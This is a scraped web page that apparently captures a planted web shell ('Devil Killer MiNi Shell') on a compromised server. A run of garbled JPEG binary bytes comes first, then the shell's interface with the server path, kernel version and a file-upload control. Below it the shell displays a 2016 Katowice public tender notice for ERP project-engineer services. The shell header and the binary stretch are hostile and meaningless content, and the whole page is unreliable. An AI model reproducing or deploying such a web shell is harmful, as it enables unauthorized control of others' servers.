JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160212/14765-N-2016.html

<p class="kh_header"><b>Katowice: Świadczenie usług Inżyniera Projektu dla projektu pn.: Miejskie Centrum Usług Wspólnych w Katowicach</b><br>
<b>Numer ogłoszenia: 14765 - 2016; data zamieszczenia: 12.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Katowice , ul. Młyńska 4, 40-098 Katowice, woj. śląskie, tel. +48 32 2593302, faks +48 327054949.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług Inżyniera Projektu dla projektu pn.: Miejskie Centrum Usług Wspólnych w Katowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)  W ramach zamówienia wykonawca zobowiązany jest do świadczenia usług polegających na pełnieniu funkcji Inżyniera Projektu przy realizacji projektu pn.: pn.: Miejskie Centrum Usług Wspólnych w Katowicach w zakres których wchodzi: udział w pracach Zespołu do spraw wdrożenia projektu, który będzie przez 4 lata trwania projektu odpowiedzialny za techniczną stronę realizacji projektu i ścisłą współpracę z Kierownikiem projektu, który będzie pełnił rolę Przewodniczącego Zespołu, nadzór operacyjny i merytoryczny w zakresie przygotowania postępowań, udział w pracach komisji przetargowej, opiniowanie dokumentów stanowiących produkty projektu - w szczególności projektu technicznego systemu ERP, odbioru wykonanych w ramach projektu prac; przeprowadzenie projektu w zakładanym zakresie rzeczowo-finansowym w określonych ramach czasowych zgodnie z wnioskiem o dofinansowanie.

2)  Przedmiot zamówienia został określony z uwzględnieniem postanowień rozdziału 2 ustawy.

3)  Szczegółowy zakres prac określa:

a)    Szczegółowy opis przedmiotu zamówienia (zał. nr 8 do SIWZ)

b)    Projekt umowy (zał. nr 7 do SIWZ).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.   Wykonawca powinien zgodnie z art. 45 ust. 3 ustawy przed upływem terminu składania ofert wnieść wadium przetargowe w wysokości 14 000,00 zł.

2.      Miejsce wniesienia wadium

1)    Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy na nw. konto Urzędu Miasta Katowice:

PKO BP S.A. II Regionalne Centrum Korporacyjne w Katowicach ul. Damrota 23

Nr 68 1020 2313 0000 3702 0514 9218 z dopiskiem - wadium dla zamówienia pn. Świadczenie usług Inżyniera Projektu dla projektu pn.: Miejskie Centrum Usług Wspólnych w Katowicach

2)    Kserokopię dowodu wpłaty wadium należy załączyć do oferty.

3)    Dokument potwierdzający wniesienie wadium w innej formie niż pieniądzu (gwarancje lub poręczenia - bezwarunkowe i płatne na pierwsze żądanie) winien być zdeponowany w Wydziale Księgowo - Rachunkowym (Katowice ul. Rynek 1, IIIp. pokój 316), w godzinach od 8:00 - 14:00 . Potwierdzona przez wykonawcę kopia ww. dokumentu powinna być załączona do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przepisy prawa nie nakładają obowiązku posiadania uprawnień do wykonywania usług będących przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych - wykonują, usługi polegające na

a)    pełnieniu nadzoru inwestorskiego lub funkcji inżyniera kontraktu/projektu dla przynajmniej 1 projektu polegającego na realizacji systemu teleinformatycznego obejmującego przynajmniej 50 jednostek organizacyjnych (niezależnych podmiotów mających osobowość prawną, wydzielonych oddziałów przedsiębiorstwa, np. filii, sklepów, biur w różnych lokalizacjach) o wartości minimum 5 000 000,00 zł brutto, w tym co najmniej jedną usługę dla projektu realizacji systemu klasy ERP dla administracji samorządowej,

b)    co najmniej 1 usługę polegającą na weryfikacji dokumentacji projektowej dla co najmniej 1 projektu o wartości minimum 5 000 000,00 zł brutto polegającego na realizacji systemu teleinformatycznego obejmującego przynajmniej 50 jednostek organizacyjnych,

c)    co najmniej 2 usługi polegające na opracowaniu dokumentacji przetargowej, w tym SIWZ, wzoru umowy dla zamówień na zaprojektowanie, dostawę i wdrożenie systemu klasy ERP o wartości minimum 2 000 000,00 zł brutto obejmującego przynajmniej 50 jednostek organizacyjnych,

d)    co najmniej 2 usługi polegające na prowadzeniu lub nadzorze i koordynacji realizacji projektu na wszystkich jego etapach, w szczególności obejmujące zarządzanie projektem teleinformatycznym w zakresie planowania i harmonogramowania prac, rozliczania projektu, zarządzania ryzykiem (m.in. identyfikacja zagrożeń i przeciwdziałanie), zarządzania zmianami, zarządzania jakością oraz monitorowania przebiegu realizacji prac,

e)    opiniowania założeń biznesowych dla systemu klasy ERP dla dużych wielopodmiotowych organizacji budżetowych administracji samorządowej składających się z przynajmniej 10 różnych podmiotów prowadzących własną wydzieloną księgowość - przynajmniej 1 opracowanie

oraz przedłożą dowody potwierdzające, że zostały one wykonane lub są wykonywane należycie.

Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w pkt.III.4) oraz będzie zgodny z formułą SPEŁNIA / NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym - posiadanie systemu wspomagania zarządzania projektem o funkcjonalności zgodnej z opisem w zał. nr 8 Szczegółowy opis przedmiotu zamówienia.

Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w pkt.III.4) oraz będzie zgodny z formułą SPEŁNIA / NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości tj.

a)    Kierownik projektu - z uwagi na fakt, że projekt prowadzony będzie w metodologii PRINCE2 - osoba posiadająca min. dwuletnie doświadczenie w prowadzeniu projektów zgodnie z metodologią PRINCE2 legitymująca się ważnym certyfikatem PRINCE2 Practitioner lub równoważnym certyfikatem potwierdzającym umiejętność prowadzenia projektu w metodologii PRINCE2,

b)    Zastępca Kierownika projektu - z uwagi na fakt, że projekt prowadzony będzie w metodologii PRINCE2 - osoba posiadająca min. dwuletnie doświadczenie w prowadzeniu projektów zgodnie z metodologią PRINCE2 legitymująca się ważnym certyfikatem PRINCE2 Foundation lub równoważnym certyfikatem potwierdzającym umiejętność prowadzenia projektu w metodologii PRINCE2, który zastępuje Kierownika projektu w razie jego nieobecności w pracy,

c)    Pracownik odpowiedzialny za weryfikację dokumentacji projektowej, który posiada minimum 2 lata doświadczenia jako analityk systemowy w dziedzinie systemów klasy ERP,

d)    Ekspert ds. procesów - osoba ze znajomością specyfiki funkcjonowania rozwiązań dla urzędów miejskich legitymująca się udziałem w prowadzeniu co najmniej 2 wdrożeń systemów klasy ERP,

e)    Konsultant ds. samorządu - osoba z doświadczeniem praktycznym w projektowaniu i wdrażaniu zintegrowanych rozwiązań informatycznych dla miast na prawach powiatu z udokumentowanym udziałem we wdrożeniach zintegrowanych rozwiązań informatycznych dla przynajmniej dwóch miast na prawach powiatu,

f)    Konsultant ds. bezpieczeństwa - osoba legitymująca się certyfikatem SABSA - Chartered Security Architect, lub Certified Information Systems Security Professional - CISSP lub równoważnym certyfikatem potwierdzającym kompetencje w ocenie bezpieczeństwa rozwiązań informatycznych i legitymująca się przygotowaniem założeń dla co najmniej 2 nowo wdrażanych rozwiązań technologicznych pod względem bezpieczeństwa przeznaczonych do użytku przez co najmniej 1000 użytkowników;

Wykonawca może dysponować osobami łączącymi dwa lub więcej ww. wymagań z wyjątkiem Kierownika projektu rola którego nie może być łączona z żadną z pozostałych.

Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w pkt.III.4) oraz będzie zgodny z formułą SPEŁNIA / NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  wysokość posiadanych środków finansowych lub zdolność kredytowa kształtuje się w wysokości nie mniejszej niż 1 000 000,00 zł.

Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w pkt. III.4) oraz będzie zgodny z formułą SPEŁNIA / NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz wykonanych (a w przypadku świadczeń okresowych lub ciągłych wykonywanych) usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie. Wykaz należy sporządzić według wzoru stanowiącego zał. nr 5 do specyfikacji.

Uwaga 1 - Dowodami, o których mowa wyżej, są:

i. poświadczenie z tym, że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert,

ii. oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w punkcie i.

iii. W przypadku, gdy zamawiający jest podmiotem, na rzecz którego dostawy lub usługi wskazane w wykazie, o którym mowa wyżej, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania ww. dowodów.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Opis posiadanego systemu wspomagania zarządzania projektem</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym załącznik do specyfikacji wraz z oświadczeniem, o spełnianiu warunków udziału w postępowaniu.

2)  Dowód wniesienia wadium

3)  Informację, czy wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług,

Uwaga:

W przypadku gdy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego j.w., w informacji tej należy również podać nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazać ich wartość bez kwoty podatku

4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

5)  W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii.

6)  Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.

7)  Sytuacja ekonomiczna i finansowa wykonawców wspólnie ubiegających się o zamówienia będzie oceniana łącznie, co oznacza, ze w szczególności: 

a)    w zakresie posiadanych środków - zsumowaniu będą podlegały środki finansowe, którymi dysponują wykonawcy wspólnie ubiegający się o zamówienie, których wysokość łącznie nie będzie niższa niż określona w pkt III.3.5) lub których zdolność kredytowa będzie nie mniejsza niż określona w pkt III.3.5).

8)  W przypadku gdy wykonawcą wspólnie ubiegającym się o zamówienie jest konsorcjum, w celu wykazania braku podstaw do wykluczenia takiego wykonawcy z postępowania dokumenty wymienione w pkt III.4.2) oraz III.4.3)  (o ile dotyczy) należy przedstawić dla każdego z partnerów konsorcjum osobno.

9)  W przypadku gdy wykonawcą wspólnie ubiegającym się o zamówienie jest spółka cywilna, w celu wykazania braku podstaw do wykluczenia takiego wykonawcy z postępowania dokumenty wymienione w pkt III.4.2) oraz III.4.3) (o ile dotyczy) należy przedstawić dla każdego ze wspólników spółki osobno.

10)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaz usług o którym mowa w pkt III.4.1) składają ww. wykonawcy wspólnie.

11)  Dokumenty, dotyczące przynależności do tej samej grupy kapitałowej określone w punkcie III.4.4) wraz z ofertą winien przedłożyć każdy z wykonawców wspólnie ubiegających się o zamówienie.

12) W przypadku powoływania się na zasoby innych podmiotów w celu spełnienia warunków udziału w postępowaniu- pisemne zobowiązanie tych podmiotów, że oddane zostaną do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.

13) Jeżeli wykonawca wykazując spełnianie warunku o którym mowa w art. 22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga załączenia do oferty dokumentów dotyczących w szczególności:

.      zakresu dostępnych wykonawcy zasobów innego podmiotu;

.      sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę przy wykonaniu zamówienia;

.      charakteru stosunku jaki będzie łączył wykonawcę z innym podmiotem;

.      zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

14) Podmiot, który zobowiązał się do udostępnienia zasobów o których mowa w pkt 12) powyżej odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.

15)  Treść zobowiązania podmiotu trzeciego powinna określać:

a)    kto jest podmiotem przyjmującym zasoby (nazwa i adres wykonawcy składającego ofertę)

b)    kto jest podmiotem oddającym zasoby (nazwa i adres podmiotu oddającego do dyspozycji zasoby)

c)    nazwa zamówienia publicznego, przy realizacji którego zasoby będą udostępniane

d)    zakres udostępnianych zasobów:

.      wiedza i doświadczenie w zakresie potwierdzenia spełniania warunku

.      potencjał techniczny (rodzaj, nazwa, model)

.      osoby zdolne do wykonania zamówienia (imię i nazwisko, funkcja lub zakres wykonywanych czynności)

.      zdolności finansowe i ekonomiczne

e)    sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia (np. podwykonawstwo, konsultacje, doradztwo). W sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. W przypadku gdy podmiot trzeci będzie brał udział w realizacji zamówienia w charakterze podwykonawcy należy wskazać część zamówienia, którą będzie realizował.

f)    charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem (np. umowa cywilno-prawna, umowa o współpracy),

g)    okresu udziału innego podmiotu przy wykonywaniu zamówienia (co najmniej na czas realizacji zamówienia).

Podwykonawcy

1)  Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.

